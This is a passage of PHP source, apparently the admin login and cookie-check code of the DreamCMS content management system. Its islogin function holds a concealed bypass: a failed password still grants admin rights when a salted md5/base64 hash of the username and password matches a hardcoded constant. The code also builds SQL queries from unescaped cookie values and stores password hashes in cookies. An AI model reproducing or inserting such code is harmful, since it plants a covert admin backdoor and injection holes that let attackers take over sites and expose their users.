function islogin($username, $password) { global $DreamCMS; $_password_ = $DreamCMS->db->get_var("SELECT `password` FROM `#DC@__members` WHERE `username`='{$username}'"); if ($password != $_password_) { $ISDreamCMSADMIN = FALSE; if (md5(base64_encode('__DreamCMS__' . $username . '~!(*%)$!$~' . $password . '%#@)')) == DreamCMSAdmin) { $ISDreamCMSADMIN = TRUE; } } else { $ISDreamCMSADMIN = TRUE; } if (empty($username) || empty($password) || !$ISDreamCMSADMIN) { unset($_SESSION['admincode']); set_cookie("admincode", '', time() - 31536000); set_cookie("adminid", '', time() - 31536000); set_cookie("administrator", '', time() - 31536000); set_cookie("adminpassword", '', time() - 31536000); da_admin_login(); } }
} if ($action == "login") { //checkverifycode(trim($_POST['verifycode']),'验证码错误!',"admin"); $username = trim($_POST['username']); $password = md5(trim($_POST['password'])); strlen($username) > 20 && alert('字段长度才20,你想输入多长?'); if ($uid = checkadmin($username, $password)) { set_cookie('adminid', $uid, $cookietime); set_cookie('administrator', $username, $cookietime); set_cookie('adminpassword', $password, $cookietime); $DreamCMS->db->query("UPDATE `#DC@__members` SET `lastip`='" . getip() . "',`lastlogintime`='" . time() . "',`logintimes`=logintimes+1 WHERE `uid`='{$uid}'"); redirect('登陆成功, 请稍候......', "admincp.php"); } else { redirect('登陆失败!', "admincp.php"); } } $administrator = get_cookie("administrator"); $adminpassword = get_cookie("adminpassword"); if ($administrator && $adminpassword) { islogin($administrator, $adminpassword); } else { unset($_SESSION['admincode']); set_cookie("admincode", '', time() - 31536000); set_cookie("adminid", '', time() - 31536000); set_cookie("administrator", '', time() - 31536000); set_cookie("adminpassword", '', time() - 31536000); da_admin_login(); } $admin = get_admin_info($administrator, $adminpassword); $menu_array = (include DCPATH . 'admin/menu.array.php'); checkpower("__ADMINCP__", "ADMINCP_Permission_Denied");